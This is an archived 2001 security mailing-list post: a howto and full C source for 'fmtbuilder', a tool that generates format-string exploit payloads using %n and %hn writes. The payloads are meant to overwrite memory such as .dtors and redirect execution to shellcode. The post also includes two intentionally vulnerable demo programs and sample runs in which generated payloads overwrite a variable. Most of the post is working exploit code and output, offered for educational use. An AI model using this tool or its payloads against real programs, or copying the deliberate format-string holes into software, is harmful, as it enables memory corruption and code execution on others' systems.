Home page logo
/

pen-test logo Penetration Testing mailing list archives

format string builder howto v0.1
From: Frederic.Raynal () inria fr
Date: Fri, 03 Aug 2001 12:11:33 +0200

FMTBUILDER-Howto version 0.1

----------------------------------------------------------------
    Frederic "Pappy" Raynal <frederic.raynal () inria fr>
    Samuel "Zorgon" Dralet <samuel.dralet () mastersecurity fr>
----------------------------------------------------------------

Date: 08/03/01

[ Contents ]

1.  Introduction
2.  Usage
3.  Example
4.  Notations and goals
5.  Solution
6.  %n way
7.  %hn way
8.  What if some text is placed before the format string
9.  Alignment
10. Example: base and alignment
11. Greetings
12. References
13. Appendix
 

----------------------------------------------------------------

-------{ 1. Introduction

This document focuses on building format strings to exploit format
bugs. The reader is supposed to know what they are and howto exploit
tham, which won't be remind here.


fmtbuider is a small program that aim at building format strings. In
this document, we explain the methods and tricks used to achieve this
goal. 

-------{ 2. Usage

Usage : ./fmtbuilder [-nh] -a <locaddr> -v <retaddr> -o <offset>

  -a <locaddr> : <locaddr> is the address to overwrite ( .dtors for instance )

  -r <retaddr> : <retaddr> is the address where we expect to return,
                 for instance because a shellcode is waiting for us ;)

  -o <offset>  : distance (in words) to reach the beginning of our
                 buffer (i.e. used with the $ format - see printf(3) )

  -b <base>    : <base> is the amount of char placed before the our
                 own part of the format string.

Two building methods, each with its own pros and cons, are available:
  
  -n :  Format string with %n
  -h :  Format string with %hn


-------{ 3. Example

For our educational purpose, we need a very easy vulnerable program:

/* formatme1.c */
int main( int argc, char ** argv ) 
{
  int bar;
  int foo = 0x41414141;
  char fmt[128];

  memset( fmt, 0, sizeof(fmt) );
  printf( "foo at 0x%x\n", &foo );
  printf( "argv[1] = [%s] (%d)\n", argv[1], strlen(argv[1]) );
  snprintf( fmt, sizeof(fmt), argv[1] );
  printf( "fmt=[%s] (%d)\n", fmt, strlen(fmt) );
  printf( "foo=0x%x\n", foo );
}

Our goal is to change the value of foo to 0x0430201.
So, we just need to discover the offset to the beginning of our
buffer:

$ gcc -o formatme1 formatme1.c
$ ./formatme1 BBBB%2$\x
foo at 0xbffff8f8
argv[1] = [BBBB%2$x] (8)
fmt=[BBBB42424242] (12)
foo=0x41414141

et hop : it is 2 :)
Since our program gives the address of "foo", we just have to run it:

$ ./formatme1 `./fmtbuilder -r 0x04030201 -a 0xbffff8f8 -b 0 -o 2 -n`
Format string builder
[ align = 0 ]
[ str = øøÿ¿ùøÿ¿úøÿ¿ûøÿ¿%241x%2$n%257x%3$n%257x%4$n%257x%5$n] (52)
foo at 0xbffff8d8
argv[1] = [øøÿ¿ùøÿ¿úøÿ¿ûøÿ¿%241x%2$n%257x%3$n%257x%4$n%257x%5$n] (52)
fmt=[øøÿ¿ùøÿ¿úøÿ¿ûøÿ¿                                           
                                                                    ] (127)
foo=0x41414141

Ok, this first run never works because the position of foo changes
when a long string is pt in the stack. But the right address is
displayed by our nice program (foo at 0xbffff8d8):

$ ./formatme1 `./fmtbuilder -r 0x04030201 -a 0xbffff8d8 -b 0 -o 2 -n`
Format string builder
[ align = 0 ]
[ str = Øøÿ¿Ùøÿ¿Úøÿ¿Ûøÿ¿%241x%2$n%257x%3$n%257x%4$n%257x%5$n ] (52)
foo at 0xbffff8d8
argv[1] = [Øøÿ¿Ùøÿ¿Úøÿ¿Ûøÿ¿%241x%2$n%257x%3$n%257x%4$n%257x%5$n] (52)
fmt=[Øøÿ¿Ùøÿ¿Úøÿ¿Ûøÿ¿                                                          
                                                     ] (127)
foo=0x4030201

And with the %hn (just the last option and the address of foo to
change): 

$ ./formatme1 `./fmtbuilder -r 0x04030201 -a 0xbffff8e8 -b 0 -o 2 -h`
Format string builder
[ align = 0 ]
[ str = èøÿ¿êøÿ¿%.66041x%2$n%.66050x%3$hn ] (33)
foo at 0xbffff8e8
argv[1] = [èøÿ¿êøÿ¿%.66041x%2$n%.66050x%3$hn] (33)
fmt=[èøÿ¿êøÿ¿00000000000000000000000000000000000000000000000000000000
     000000000000000000000000000000000000000000000000000000000000000] (127)
foo=0x4030201


-------{ 4. Notations and goals


a 32-bits address is noted [b3 b2 b1 b0] where :
  - b0 = ( addr >> 24 ) & 0xff;
  - b1 = ( addr >> 16 ) & 0xff;
  - b2 = ( addr >>  8 ) & 0xff;
  - b3 = ( addr       ) & 0xff;

Suppose we wants to write x0 to b0, x1 to b1... (where xi is an
unsigned char in { 0...255 }).

Independently from the method used to write (%n or %hn), since %n is
strictly increasing, troubles occur as soon as we don't have
x3 < x2 < x1 < x0 which is almost always the case ;(

One needs a trick ... and (can you hear the drums rolls;) here it
comes : the solution is always to force that inequality to be true !

Yes, it seems incredible, isn't it ;)))


-------{ 5. Solution


A simple but inefficient solution would be to sort each of the xi, but
that leads to a very painful algorithm since there is 4! = 4 * 3 * 2 * 1 = 24 
available permutations (and thus as much "special cases" to handle)

We said that the xi's are in { 0...255 } ... but we are going to put
them in { 256...511 }, by simply adding 256 to each value. And so, one
byte is no more enough to hold the value, but that is really no matter
since we are going to use several writings:

  for one writing, we are only interested in the last of the 2 bytes, 
  the next writing erasing the other (garbage) byte.


[ Example ]

Let's x3 = 0x44, x2 = 0x33, x1 = 0x0f and x0 = 0x01

One wants to put in memory [ 0x44 0x33 0x02 0x01 ] ... but
unfortunately, 0x44 > 0x33

Nevertheless, 0x44 < 0x0133 :)   <- Here is the solution :)

Rather than writing the expected value at a given position, one has to 
consider this value plus 0x0100. Since the value to write is in
{ 0...255 }, the written one will be in { 0...255 } + 0x0100 = { 256...511 } 
and is now coded with 2 bytes.

|---------------------------|------------------------|---------------------|
|     bytes                 |        total           |      retaddr        |
|---------------------------|------------------------|---------------------|
| 0x44+0x0100      = 0x0144 |          0x0144        | 0x44 0x01   X    X  |
| 0x33+0x0100-0x44 = 0x00ef | 0x0144+0x00ef = 0x0233 | 0x44 0x33 0x02   X  |
| 0x0f+0x0100-0x33 = 0x00dc | 0x0203+0x00dc = 0x030f | 0x44 0x33 0x0f 0x03 |
| 0x01+0x0100-0x0f = 0x00f2 | 0x030f+0x00f2 = 0x0401 | 0x44 0x33 0x0f 0x01 |
|---------------------------|------------------------|---------------------| 
( X = undefined )


As you can notice in the above table, the "garbage byte" always
increases and that is what ensures the inequality to be always true.


-------{ 6. %n way

The format string is built using 4 consecutive writings %n, (almost)
as described in Kalou's article (see the references). 

The only difference is the use of the previous trick, which really
makes life easier ;)

pros:
  - sometimes, format bugs are also overflow:

    int main( int argc, char ** argv ) 
    {
        char buf[64];
        sprintf( buf, argv[1] );
    }

    Trying to exploit this with %hn will lead to an overflow: the
    string formatted by argv[1] will expand but since no check is
    done, it will overflow the buffer and coredump.

cons:
  - the string is longer than with the %hn: one needs the 4 %x, one
    for each %n

  - can overwrite something that is no more in the format string: as
    shown in the example, writing with %n gets out of bounds. This
    could become annoying if it changes the value of something
    important:

      + a variable (or a pointer):
                     int i = 0;    
                     char fmt[64];
                     ...
                     printf(fmt);

      + the saved %ebp:
                     void foo() {
                       char fmt[64];
                       ...
                       printf(fmt);


-------{ 7. %hn way


In a previous article about format bugs, I introduced another solution
to build the format string using %hn. This solves the cons of the %n
approach :

  - the string is shorter since you just need 2 %x before the %hn
  - you don't overwrite anything after the format string since you
    write only 2 short int (2 bytes each)

Unfortunately, the %hn approach has to face the same problem as with
%n: the count is strictly increasing ... but almost the same solution
allows to solve that ;)

In the article, I used a format string looking like that :

          %[val1]x%[val2]x%[offset]hn%[offset+2]hn

Now, rather than using 2 %hn, we use firstly a %n and then a %hn. The
first %n writes to all the retaddr, even if only the last 2 bytes are
interesting (i.e. the ones we expect). Then, the %hn overwrite those 2
"garbage" bytes with the exact value, without overflowing after the
address. 

With the %n technique, the values are in { 0...255 }. Since we now use 2
bytes, they are now in { 0...255 * 255 }. So, to be greater than the
previous written value, adding 0x0100 is no more enough, so we add
0x0100 * 0x0100 = 0x010000 instead.


[ Example ]

We still consider the same values as in the previous example.

The first short we have to write is the low part : 0x4433 but
unfortunately, 0x4433 > 0x0f01
Nevertheless, 0x4433 < 0x010f01.

Rather than writing the expected value at a given position, one has to
consider this value plus 0x010000. Since the value to write is in
{ 0...65535 }, the written one will be in { 0...65535 } + 0x010000 = 
{ 65536...131071 } and is now coded with 3 bytes (ok, 4... but the
last one will be zero)


|-----------------------------|------------------------|---------------------|
|         bytes               |        total           |      retaddr        |
|-----------------------------|------------------------|---------------------|
|0x4433+0x010000=0x014433     |      0x014433          | 0x44 0x33 0x01   X  |
|0x0f01+0x010000-0x4433=0xcace|0x014433+0xcace=0x020f01| 0x44 0x33 0x0f 0x01 |
|-----------------------------|------------------------|---------------------|

The second writing is truncated because of the %hn: it cast the value
to a short int and hence keeps only the last two bytes, which are
exactly what we want.


-------{ 8. What if some text is placed before the format string
 

That's no big deal ;)
If you look in the sources (always look in the source, Luke;) you will
notice that having some character before the format string or not
makes almost no difference.

What is done to handle values xi smaller than the previous ones
(i.e. adding 0x0100 - 0x010000 - to this value) is also usable to
handle what we call the "base" (these first char) : we also add
0x0100 (or 0x010000) to the very first value to be sure that our last
char will be the one we expect.

3 situations are possible:
  1. base <  x3 : we just have to write x3-base in our format
  2. base == x3 : idem
  3. base >  x3 : x3 has to be increased to exceed "base" 


But since adding 0x0100 (0x010000) doesn't change our target byte(s),
we can continue that way. So, we have to add ( base / 0x0100 ) + 1
(resp. (base / 0x010000) + 1) to x3 to be greater than "base".

[ Example ] 

Take base = 0x0224 (548) (yes, I know, that will never be like that... it
is just to show that our algo is not so bad ;) and x3 = 0x44.

Using the %n approach, adding only 0x0100 is not enough
( 0x0100 + 0x44 = 0x0144 < 0x0224 ) So, we have to add 0x0100 until we are
greater than 0x0224 ... which is exactly given by ( 0x0224 / 0x0100 + 1 = 3 ).

Finally, the first writing is :
0x44 + 3 * 0x0100 - 0x0224 = 0x0120

Like that, we have written 0x120 + 0x0224 = 0x0344 char for our first
%n: as you  can see, the last byte is the one expected :)

-------{ 9. Alignment

When dealing with buffer overflows, one has to take care about the
alignment in memory. With format bugs, this is almost never useful :)

The string used as format string is aligned in memory. The only thing
that could break that occurs when some char are already in the string
that is going to be exploited.

For instance, if the string contains "Alert" before being submitted to
our will, one will have to add 3 char just after so that the length is
multiple of 4, and thus aligned in memory : "AlertXXX".

We call "base" the length of those char previously in the string.

More generally, one just have to add ( 4 - base%4 ) (% means modulo) to
base to have a string that is well aligned.

A great care has to be taken when alignment in non-zero to discover
the offset. One can not expect anymore to retrieve his "marker" in a
full word. See the following example for further details.

-------{ 10. Example: base and alignment

/* formatme2.c */
int main( int argc, char **argv ) 
{
  int bar;
  int foo = 0x41414141;
  char buffer[1024];

  snprintf( buffer, sizeof(buffer), "%s%s", argv[1], argv[2] );
  printf( "foo is at 0x%x\n", &foo );
  printf( buffer );
  printf( "\nfoo=0x%x\n", foo );
}

We will use an unaligned input string "ABCDE", so we start by guessing
the offset:

$ ./formatme2 ABCDE BBBB%5\$x
foo is at 0xbffff7c8
ABCDEBBBB42424245
foo=0x41414141

$ ./formatme2 ABCDE BBBB%6\$x
foo is at 0xbffff7c8
ABCDEBBBB24362542
foo=0x41414141

We retrieve our BBBB across both offsets 5 and 6. Since we are going
to add char to align the buffer, we have to use the upper one (6):

$ ./formatme2 ABCDE `./fmtbuilder -r 0x04030201 -a 0xbffff798 -b 5 -o 6 -n`
Format string builder
[ align = 3 ]
[ str = ÷ÿ¿÷ÿ¿÷ÿ¿÷ÿ¿%233x%6$n%257x%7$n%257x%8$n%257x%9$n ] (52)
foo is at 0xbffff798
ABCDEFGXXX÷ÿ¿÷ÿ¿÷ÿ¿÷ÿ¿                                                
...
 bffff798
...
 4015e000
...
 bffff74c
...      44434241
foo=0x4030201

Great :)

$ ./formatme2 ABCDE `./fmtbuilder -r 0x04030201 -a 0xbffff7a8 -b 5 -o 6 -h` 
Format string builder
[ align = 3 ]
[ str = ÷ÿ¿ª÷ÿ¿%.66033x%6$n%.66050x%7$hn ] (33)
foo is at 0xbffff7a8
ABCDEXXX¨÷ÿ¿ª÷ÿ¿00000000000000000000000000000000000000000000000 ...
...
...
...
...
00000000000000000000000000000000000000000000000000000004015e000
foo=0x4030201

Still fine :) Lines full of 0 are cut.


-------{ 11. Greetings

To Christophe "Korty" Bailleux for having submitted to us the
problem of automatic format string builder and all his comments.

-------{ 12. References

How to learn more about format strings ?

[1] "More info on format bugs"
    Pascal "kalou" Bouchareine <pb () grolier fr>

[2] "Format Bugs: What are they, Where did they come from,...
     How to exploit them "
    Lamagra <lamagra () digibel org>    

[3] "Avoiding security holes when developing an application - 4:
     Format strings"
    Frederic "pappy" Raynal <frederic.raynal () inria fr> 
    Christophe Grenier <cgr () global-secure fr>
    Christophe Blaess <ccb () club-internet fr>

-------{ 13. Appendix
/* 
 * Copyright (C) 2001  Frederic "Pappy" Raynal <frederic.raynal () inria fr>
 * Copyright (C) 2001  Samuel "Zorgon" Dralet <samuel.dralet () mastersecurity fr>
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or (at
 * your option) any later version.
 * 
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
 * USA
 *
 */


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define ADD     0x100   
#define OCT( b0, b1, b2, b3, addr ) { \
                b0 = (addr >> 24) & 0xff; \
                b1 = (addr >> 16) & 0xff; \
                b2 = (addr >>  8) & 0xff; \
                b3 = (addr      ) & 0xff; \
        }

void 
usage (char * cmd )
{

  fprintf(stderr, "------------------------------------------------------------
----\n");
  fprintf( stderr, "                   Format string builder\n" );
  fprintf(stderr, "       Frederic \"Pappy\" Raynal <frederic.raynal () inria fr>
\n");
  fprintf(stderr, "    Samuel \"Zorgon\" Dralet <samuel.dralet () mastersecurity f
r>\n");
  fprintf(stderr, "------------------------------------------------------------
----\n");

  fprintf( stderr, "\n" );
  fprintf( stderr, "Usage : %s [-nh] -a <locaddr> -v <retaddr> -o <offset>\n", 
cmd );
  fprintf( stderr, "  -n :\tFormat string with %%n\n");
  fprintf( stderr, "  -h :\tFormat string with %%hn\n");
  fprintf( stderr, "  -a <locaddr> : address to overwrite (like .dtors)\n");
  fprintf( stderr, "  -r <retaddr> : where we want to return (shellcode)\n" );
  fprintf( stderr, "  -o <offset>  : distance in 'words' to reach the part of 
the buffer we control\n" );
  fprintf( stderr, "  -b <base>    : amount of char previously in the 
string\n\n" );
  fprintf( stderr, "E.g: %s -n -a 0x080495e8 -r 0x01020304 -o 4 -b 0\n\n", cmd 
);
  fprintf( stderr, "[EOF]\n\n" );
}

char *
build_un( unsigned int retaddr, unsigned int offset, unsigned int base )
{
  char * buf;

  /* on calcule ou on laisse comme ca */
  unsigned int length = 128;
  unsigned char b0, b1, b2, b3;
  int start = ((base / ADD) + 1)*ADD;
  
  fprintf(stderr, "start=%d\n", start);


  OCT( b0, b1, b2, b3, retaddr );
  if ( !(buf = (char *)malloc(length * sizeof(char))) ) {
    fprintf( stderr, "Can't allocate buffer (%d)\n", length );
    exit( -1 );
  }
  memset( buf, 0, length ); 

  snprintf( buf, length, 
            "%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n",
            b3 - (sizeof( size_t ) * 4) + start - base, offset,
            b2 - b3 + start, offset + 1,
            b1 - b2 + start, offset + 2,
            b0 - b1 + start, offset + 3 );

  return buf;
}

char * 
build_hn( unsigned int retaddr, unsigned int offset, unsigned int base )
{
  unsigned int length; 
  unsigned int high, low;
  char * buf;
  int start = ((base / (ADD*ADD)) + 1)*ADD*ADD;

  high = ( retaddr & 0xffff0000 ) >> 16; 
  low = retaddr & 0x0000ffff;      

  /* Certainement a recalculer  ou egale a 128*/
  length = ( sizeof( offset ) * 2 ) + sizeof( high ) + sizeof( low ) + 15;
  if ( !(buf = (char *)malloc(length * sizeof(char))) ) {
    fprintf( stderr, "Can't allocate buffer (%d)\n", length );
    exit( -1 );
  }
  memset( buf, 0, length );

  snprintf( buf, length, 
            "%%.%hdx%%%d$n%%.%hdx%%%d$hn", 
            low - ( sizeof( size_t ) * 2 ) + start - base, 
            offset, 
            high - low + start, 
            offset+1 );
  return buf;
}

int 
main( int argc, char * argv[] )
{
        
  char opt;
  char * fmt;
  char * endian; /* la partie de la chaine contenant les adresses à écraser */
  unsigned long locaddr, retaddr;
  unsigned int offset, base, align = 0;
  unsigned char b0, b1, b2, b3;
  int length, ch;
 
  if ( argc != 10 ) {
    usage( argv[0] );
    exit( -1 );
  }

  length = ( sizeof( size_t ) * 16 ) + 1; 

  if ( !(endian = (char *)malloc(length * sizeof(char))) ) {
    fprintf( stderr, "Can't allocate buffer (%d)\n", length );
    exit( -1 );
  }
  memset( endian, 0, length );

  while ( (opt = getopt( argc, argv, "nha:r:o:b:" )) != EOF )
    switch( opt )
      {
        case 'n':
          ch = 0;
          break;
        case 'h':
          ch = 1;
          break;
        case 'a':
          locaddr = strtoul( optarg, NULL, 16 );
          break;
        case 'r':
          retaddr = strtoul( optarg, NULL, 16 );
          break;
        case 'o':
          offset = atoi( optarg );
          break;
        case 'b':
          base = atoi( optarg );
          break;
        default:
          usage(argv[0]);
          exit( -1 );
      }

  OCT( b0, b1, b2, b3, locaddr );

  if ( base%4 ) {
    align = 4 - ( base%4 );
    base += align;
  }

  if ( ch == 0 ) {
    snprintf( endian, length, 
              "%c%c%c%c"
              "%c%c%c%c"
              "%c%c%c%c"
              "%c%c%c%c",
              b3, b2, b1, b0,
              b3 + 1, b2, b1, b0,
              b3 + 2, b2, b1, b0,
              b3 + 3, b2, b1, b0 );
    fmt = build_un( retaddr, offset, base );
  }
  else {
    snprintf( endian, length,
              "%c%c%c%c"
              "%c%c%c%c",
              b3, b2, b1, b0,
              b3 + 2, b2, b1, b0 );

    fmt = build_hn( retaddr, offset, base );
  }
        

  fprintf(stderr, "align=%d\n", align);
  fprintf( stderr, "str=[%s%s] (%d)", endian, fmt, strlen(endian)+strlen(fmt) 
);
  for( ; align>0; --align) 
    printf("X");
  printf( "%s%s", endian, fmt );
  fprintf(stderr, "\n");
  return( 0 );
}



----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/


  By Date           By Thread  

Current thread:
  • format string builder howto v0.1 Frederic . Raynal (Aug 05)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]